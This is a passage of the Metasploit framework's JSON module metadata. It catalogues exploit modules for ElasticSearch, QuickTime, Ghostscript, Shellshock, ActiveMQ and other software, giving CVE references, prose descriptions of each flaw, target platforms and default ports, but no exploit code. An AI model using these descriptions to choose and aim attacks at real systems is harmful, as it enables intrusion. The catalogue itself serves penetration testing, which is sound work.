"BID-23608",
"ZDI-07-023"
],
"platform": "OSX,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quicktime 7 on Windows x86",
"Quicktime 7 on Mac OS X PPC",
"Quicktime 7 on Mac OS X x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/browser/qtjava_pointer.rb",
"is_install_path": true,
"ref_name": "multi/browser/qtjava_pointer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/elasticsearch/script_mvel_rce": {
"name": "ElasticSearch Dynamic Script Arbitrary Java Execution",
"full_name": "exploit/multi/elasticsearch/script_mvel_rce",
"rank": 600,
"disclosure_date": "2013-12-09",
"type": "exploit",
"author": [
"Alex Brasetvik",
"Bouke van der Bijl",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,\n exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the\n REST API, which does not require authentication, where the search\n function allows dynamic scripts execution. It can be used for remote attackers\n to execute arbitrary Java code. This module has been tested successfully on\n ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.",
"references": [
"CVE-2014-3120",
"OSVDB-106949",
"EDB-33370",
"URL-http://bouk.co/blog/elasticsearch-rce/",
"URL-https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch"
],
"platform": "Java",
"arch": "java",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ElasticSearch 1.1.1 / Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/elasticsearch/script_mvel_rce.rb",
"is_install_path": true,
"ref_name": "multi/elasticsearch/script_mvel_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/elasticsearch/search_groovy_script": {
"name": "ElasticSearch Search Groovy Sandbox Bypass",
"full_name": "exploit/multi/elasticsearch/search_groovy_script",
"rank": 600,
"disclosure_date": "2015-02-11",
"type": "exploit",
"author": [
"Cameron Morris",
"Darren Martyn",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,\n exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the\n REST API, which does not require authentication, where the search function allows\n groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName\n to reference arbitrary classes. It can be used to execute arbitrary Java code. This\n module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.",
"references": [
"CVE-2015-1427",
"URL-https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/",
"URL-https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch",
"URL-http://drops.wooyun.org/papers/5107"
],
"platform": "Java",
"arch": "java",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ElasticSearch 1.4.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/elasticsearch/search_groovy_script.rb",
"is_install_path": true,
"ref_name": "multi/elasticsearch/search_groovy_script",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/adobe_u3d_meshcont": {
"name": "Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",
"full_name": "exploit/multi/fileformat/adobe_u3d_meshcont",
"rank": 400,
"disclosure_date": "2009-10-13",
"type": "exploit",
"author": [
"Felipe Andres Manzano <felipe.andres.manzano@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a\n specially crafted pdf that a contains malformed U3D data, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2009-2990",
"OSVDB-58920",
"BID-36665",
"URL-http://sites.google.com/site/felipeandresmanzano/",
"URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html"
],
"platform": "Linux,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader Windows Universal (JS Heap Spray)",
"Adobe Reader Linux Universal (JS Heap Spray)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/adobe_u3d_meshcont",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/evince_cbt_cmd_injection": {
"name": "Evince CBT File Command Injection",
"full_name": "exploit/multi/fileformat/evince_cbt_cmd_injection",
"rank": 600,
"disclosure_date": "2017-07-13",
"type": "exploit",
"author": [
"Felix Wilhelm",
"Sebastian Krahmer",
"Matlink",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in Evince\n before version 3.24.1 when opening comic book `.cbt` files.\n\n Some file manager software, such as Nautilus and Atril, may allow\n automatic exploitation without user interaction due to thumbnailer\n preview functionality.\n\n Note that limited space is available for the payload (<256 bytes).\n Reverse Bash and Reverse Netcat payloads should be sufficiently small.\n\n This module has been tested successfully on evince versions:\n\n 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;\n 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.",
"references": [
"BID-99597",
"CVE-2017-1000083",
"EDB-45824",
"URL-https://seclists.org/oss-sec/2017/q3/128",
"URL-https://bugzilla.gnome.org/show_bug.cgi?id=784630",
"URL-https://bugzilla.suse.com/show_bug.cgi?id=1046856",
"URL-https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418",
"URL-https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662",
"URL-https://access.redhat.com/security/cve/cve-2017-1000083",
"URL-https://security-tracker.debian.org/tracker/CVE-2017-1000083"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-02-03 06:18:31 +0000",
"path": "/modules/exploits/multi/fileformat/evince_cbt_cmd_injection.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/evince_cbt_cmd_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/ghostscript_failed_restore": {
"name": "Ghostscript Failed Restore Command Execution",
"full_name": "exploit/multi/fileformat/ghostscript_failed_restore",
"rank": 600,
"disclosure_date": "2018-08-21",
"type": "exploit",
"author": [
"Tavis Ormandy",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a -dSAFER bypass in Ghostscript to execute\n arbitrary commands by handling a failed restore (grestore) in\n PostScript to disable LockSafetyParams and avoid invalidaccess.\n\n This vulnerability is reachable via libraries such as ImageMagick.",
"references": [
"CVE-2018-16509",
"URL-https://seclists.org/oss-sec/2018/q3/142",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1640"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd, x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix (In-Memory)",
"PowerShell (In-Memory)",
"Linux (Dropper)"
],
"mod_time": "2019-04-24 11:34:42 +0000",
"path": "/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/ghostscript_failed_restore",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"RelatedModules": [
"exploit/unix/fileformat/ghostscript_type_confusion",
"exploit/unix/fileformat/imagemagick_delegate"
]
}
},
"exploit_multi/fileformat/js_unpacker_eval_injection": {
"name": "Javascript Injection for Eval-based Unpackers",
"full_name": "exploit/multi/fileformat/js_unpacker_eval_injection",
"rank": 600,
"disclosure_date": "2015-02-18",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module generates a Javascript file that executes arbitrary code\n when an eval-based unpacker is run on it. Works against js-beautify's\n P_A_C_K_E_R unpacker.",
"references": [
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/js_unpacker_eval_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/libreoffice_macro_exec": {
"name": "LibreOffice Macro Code Execution",
"full_name": "exploit/multi/fileformat/libreoffice_macro_exec",
"rank": 300,
"disclosure_date": "2018-10-18",
"type": "exploit",
"author": [
"Alex Inführ",
"Shelby Pace"
],
"description": "LibreOffice comes bundled with sample macros written in Python and\n allows the ability to bind program events to them. A macro can be tied\n to a program event by including the script that contains the macro and\n the function name to be executed. Additionally, a directory traversal\n vulnerability exists in the component that references the Python script\n to be executed. This allows a program event to execute functions from Python\n scripts relative to the path of the samples macros folder. The pydoc.py script\n included with LibreOffice contains the tempfilepager function that passes\n arguments to os.system, allowing RCE.\n\n This module generates an ODT file with a mouse over event that\n when triggered, will execute arbitrary code.",
"references": [
"CVE-2018-16858",
"URL-https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html"
],
"platform": "Linux,Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2019-04-17 08:29:58 +0000",
"path": "/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/libreoffice_macro_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/maple_maplet": {
"name": "Maple Maplet File Creation and Command Execution",
"full_name": "exploit/multi/fileformat/maple_maplet",
"rank": 600,
"disclosure_date": "2010-04-26",
"type": "exploit",
"author": [
"scriptjunkie"
],
"description": "This module harnesses Maple's ability to create files and execute commands\n automatically when opening a Maplet. All versions up to 13 are suspected\n vulnerable. Testing was conducted with version 13 on Windows. Standard security\n settings prevent code from running in a normal maple worksheet without user\n interaction, but those setting do not prevent code in a Maplet from running.\n\n In order for the payload to be executed, an attacker must convince someone to\n open a specially modified .maplet file with Maple. By doing so, an attacker can\n execute arbitrary code as the victim user.",
"references": [
"OSVDB-64541",
"URL-http://www.maplesoft.com/products/maple/"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Windows X64",
"Linux",
"Linux X64",
"Universal CMD"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/maple_maplet.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/maple_maplet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/nodejs_js_yaml_load_code_exec": {
"name": "Nodejs js-yaml load() Code Execution",
"full_name": "exploit/multi/fileformat/nodejs_js_yaml_load_code_exec",
"rank": 600,
"disclosure_date": "2013-06-28",
"type": "exploit",
"author": [
"Neal Poole",
"joev <joev@metasploit.com>"
],
"description": "This module can be used to abuse node.js applications that parse user-supplied YAML input\n using the load() function from the 'js-yaml' package < 2.0.5, which doesn't properly handle\n the unsafe !!js/function tag, allowing to specify a self-executing function which results\n on execution of arbitrary javascript code.",
"references": [
"CVE-2013-4660",
"OSVDB-94656",
"BID-60867",
"URL-https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/"
],
"platform": "NodeJS",
"arch": "nodejs",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/nodejs_js_yaml_load_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/office_word_macro": {
"name": "Microsoft Office Word Malicious Macro Execution",
"full_name": "exploit/multi/fileformat/office_word_macro",
"rank": 600,
"disclosure_date": "2012-01-10",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module injects a malicious macro into a Microsoft Office Word document (docx). The\n comments field in the metadata is injected with a Base64 encoded payload, which will be\n decoded by the macro and execute as a Windows executable.\n\n For a successful attack, the victim is required to manually enable macro execution.",
"references": [
"URL-https://en.wikipedia.org/wiki/Macro_virus"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Word on Windows",
"Microsoft Office Word on Mac OS X (Python)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/office_word_macro.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/office_word_macro",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/peazip_command_injection": {
"name": "PeaZip Zip Processing Command Injection",
"full_name": "exploit/multi/fileformat/peazip_command_injection",
"rank": 600,
"disclosure_date": "2009-06-05",
"type": "exploit",
"author": [
"pyrokinesis",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in PeaZip. All\n versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with\n version 2.6.1 on Windows.\n\n In order for the command to be executed, an attacker must convince someone to\n open a specially crafted zip file with PeaZip, and access the specially file via\n double-clicking it. By doing so, an attacker can execute arbitrary commands\n as the victim user.",
"references": [
"CVE-2009-2261",
"OSVDB-54966",
"URL-http://peazip.sourceforge.net/",
"EDB-8881"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/fileformat/peazip_command_injection.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/peazip_command_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/fileformat/swagger_param_inject": {
"name": "JSON Swagger CodeGen Parameter Injector",
"full_name": "exploit/multi/fileformat/swagger_param_inject",
"rank": 600,
"disclosure_date": "2016-06-23",
"type": "exploit",
"author": [
"ethersnowman <scott_davis@rapid7.com>"
],
"description": "This module generates an Open API Specification 2.0 (Swagger) compliant\n json document that includes payload insertion points in parameters.\n\n In order for the payload to be executed, an attacker must convince\n someone to generate code from a specially modified swagger.json file\n within a vulnerable swagger-codgen appliance/container/api/service,\n and then to execute that generated code (or include it into software\n which will later be executed by another victim). By doing so, an\n attacker can execute arbitrary code as the victim user. The same\n vulnerability exists in the YAML format.",
"references": [
"CVE-2016-5641",
"URL-http://github.com/swagger-api/swagger-codegen",
"URL-https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
],
"platform": "Java,NodeJS,PHP,Ruby",
"arch": "nodejs, php, java, ruby",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NodeJS",
"PHP",
"Java JSP",
"Ruby"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/fileformat/swagger_param_inject.rb",
"is_install_path": true,
"ref_name": "multi/fileformat/swagger_param_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/ftp/pureftpd_bash_env_exec": {
"name": "Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)",
"full_name": "exploit/multi/ftp/pureftpd_bash_env_exec",
"rank": 600,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"Frank Denis",
"Spencer McIntyre"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets the Pure-FTPd FTP\n server when it has been compiled with the --with-extauth flag and an external\n Bash script is used for authentication. If the server is not set up this way,\n the exploit will fail, even if the version of Bash in use is vulnerable.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc",
"URL-http://download.pureftpd.org/pub/pure-ftpd/doc/README.Authentication-Modules"
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "multi/ftp/pureftpd_bash_env_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/ftp/wuftpd_site_exec_format": {
"name": "WU-FTPD SITE EXEC/INDEX Format String Vulnerability",
"full_name": "exploit/multi/ftp/wuftpd_site_exec_format",
"rank": 500,
"disclosure_date": "2000-06-22",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in versions of the\n Washington University FTP server older than 2.6.1. By executing\n specially crafted SITE EXEC or SITE INDEX commands containing format\n specifiers, an attacker can corrupt memory and execute arbitrary code.",
"references": [
"CVE-2000-0573",
"OSVDB-11805",
"BID-1387"
],
"platform": "Linux",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)",
"RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)",
"Debug"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb",
"is_install_path": true,
"ref_name": "multi/ftp/wuftpd_site_exec_format",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/gdb/gdb_server_exec": {
"name": "GDB Server Remote Payload Execution",
"full_name": "exploit/multi/gdb/gdb_server_exec",
"rank": 500,
"disclosure_date": "2014-08-24",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module attempts to execute an arbitrary payload on a loose gdbserver service.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/pull/3691"
],
"platform": "Linux,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"x86 (32-bit)",
"x86_64 (64-bit)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/gdb/gdb_server_exec.rb",
"is_install_path": true,
"ref_name": "multi/gdb/gdb_server_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/hams/steamed": {
"name": "Steamed Hams",
"full_name": "exploit/multi/hams/steamed",
"rank": 0,
"disclosure_date": "2018-04-01",
"type": "exploit",
"author": [
"bcook-r7"
],
"description": "but it's a Metasploit Module",
"references": [
"URL-https://www.youtube.com/watch?v=mkX3dO6KN54"
],
"platform": "Android,Apple_iOS,BSD,Java,JavaScript,Linux,Mainframe,Multi,NodeJS,OSX,PHP,Python,Ruby,Solaris,Unix,Windows",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"An Unforgettable Luncheon",
"Legitimate Theater"
],
"mod_time": "2018-05-24 11:01:26 +0000",
"path": "/modules/exploits/multi/hams/steamed.rb",
"is_install_path": true,
"ref_name": "multi/hams/steamed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/handler": {
"name": "Generic Payload Handler",
"full_name": "exploit/multi/handler",
"rank": 0,
"disclosure_date": null,
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"bcook-r7"
],
"description": "This module is a stub that provides all of the\n features of the Metasploit payload system to exploits\n that have been launched outside of the framework.",
"references": [
],
"platform": "Android,Apple_iOS,BSD,Java,JavaScript,Linux,Mainframe,Multi,NodeJS,OSX,PHP,Python,Ruby,Solaris,Unix,Windows",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Wildcard Target"
],
"mod_time": "2018-02-27 04:30:09 +0000",
"path": "/modules/exploits/multi/handler.rb",
"is_install_path": true,
"ref_name": "multi/handler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/activecollab_chat": {
"name": "Active Collab \"chat module\" Remote PHP Code Injection Exploit",
"full_name": "exploit/multi/http/activecollab_chat",
"rank": 600,
"disclosure_date": "2012-05-30",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits an arbitrary code injection vulnerability in the\n chat module that is part of Active Collab versions 2.3.8 and earlier by\n abusing a preg_replace() using the /e modifier and its replacement\n string using double quotes. The vulnerable function can be found in\n activecollab/application/modules/chat/functions/html_to_text.php.",
"references": [
"CVE-2012-6554",
"OSVDB-81966",
"URL-http://www.activecollab.com/downloads/category/4/package/62/releases"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/activecollab_chat.rb",
"is_install_path": true,
"ref_name": "multi/http/activecollab_chat",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/ajaxplorer_checkinstall_exec": {
"name": "AjaXplorer checkInstall.php Remote Command Execution",
"full_name": "exploit/multi/http/ajaxplorer_checkinstall_exec",
"rank": 600,
"disclosure_date": "2010-04-04",
"type": "exploit",
"author": [
"Julien Cayssol",
"David Maciejak",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to\n 2.6 are vulnerable.",
"references": [
"OSVDB-63552",
"BID-39334"
],
"platform": "BSD,Linux,OSX,Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"AjaXplorer 2.5.5 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/ajaxplorer_checkinstall_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/apache_activemq_upload_jsp": {
"name": "ActiveMQ web shell upload",
"full_name": "exploit/multi/http/apache_activemq_upload_jsp",
"rank": 600,
"disclosure_date": "2016-06-01",
"type": "exploit",
"author": [
"Ian Anderson <andrsn84@gmail.com>",
"Hillary Benson <1n7r1gu3@gmail.com>"
],
"description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0\n allows remote attackers to upload and execute arbitrary files via an\n HTTP PUT followed by an HTTP MOVE request.",
"references": [
"CVE-2016-3088",
"URL-http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 8161,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal",
"Linux",
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/apache_activemq_upload_jsp.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_activemq_upload_jsp",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/apache_jetspeed_file_upload": {
"name": "Apache Jetspeed Arbitrary File Upload",
"full_name": "exploit/multi/http/apache_jetspeed_file_upload",
"rank": 0,
"disclosure_date": "2016-03-06",
"type": "exploit",
"author": [
"Andreas Lindh",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits the unsecured User Manager REST API and a ZIP file\n path traversal in Apache Jetspeed-2, version 2.3.0 and unknown earlier\n versions, to upload and execute a shell.\n\n Note: this exploit will create, use, and then delete a new admin user.\n\n Warning: in testing, exploiting the file upload clobbered the web\n interface beyond repair. No workaround has been found yet. Use this\n module at your own risk. No check will be implemented.",
"references": [
"CVE-2016-0710",
"CVE-2016-0709",
"URL-http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and",
"URL-https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709",
"URL-https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Apache Jetspeed <= 2.3.0 (Linux)",
"Apache Jetspeed <= 2.3.0 (Windows)"
],
"mod_time": "2019-02-25 11:32:06 +0000",
"path": "/modules/exploits/multi/http/apache_jetspeed_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_jetspeed_file_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/apache_mod_cgi_bash_env_exec": {
"name": "Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)",
"full_name": "exploit/multi/http/apache_mod_cgi_bash_env_exec",
"rank": 600,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Stephane Chazelas",
"wvu <wvu@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"lcamtuf"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets CGI scripts in the\n Apache web server by setting the HTTP_USER_AGENT environment variable to a\n malicious function definition.",
"references": [
"CVE-2014-6271",
"CVE-2014-6278",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://access.redhat.com/articles/1200223",
"URL-https://seclists.org/oss-sec/2014/q3/649"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux x86",
"Linux x86_64"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_mod_cgi_bash_env_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_multi/http/apache_roller_ognl_injection": {
"name": "Apache Roller OGNL Injection",
"full_name": "exploit/multi/http/apache_roller_ognl_injection",
"rank": 600,
"disclosure_date": "2013-10-31",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an OGNL injection vulnerability in Apache Roller < 5.0.2. The\n vulnerability is due to an OGNL injection on the UIAction controller because of an\n insecure usage of the ActionSupport.getText method. This module has been tested\n successfully on Apache Roller 5.0.1 on Ubuntu 10.04.",
"references": [
"CVE-2013-4212",
"URL-http://security.coverity.com/advisory/2013/Oct/remote-code-execution-in-apache-roller-via-ognl-injection.html"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Apache Roller 5.0.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/apache_roller_ognl_injection.rb",
"is_install_path": true,
"ref_name": "multi/http/apache_roller_ognl_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/apprain_upload_exec": {
"name": "appRain CMF Arbitrary PHP File Upload Vulnerability",
"full_name": "exploit/multi/http/apprain_upload_exec",
"rank": 600,
"disclosure_date": "2012-01-19",
"type": "exploit",
"author": [
"EgiX",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in appRain's Content Management\n Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a\n malicious user can upload a file to the uploads/ directory without any\n authentication, which results in arbitrary code execution.",
"references": [
"CVE-2012-1153",
"OSVDB-78473",
"EDB-18392",
"BID-51576"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"appRain 0.1.5 or less"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/apprain_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/apprain_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/atutor_sqli": {
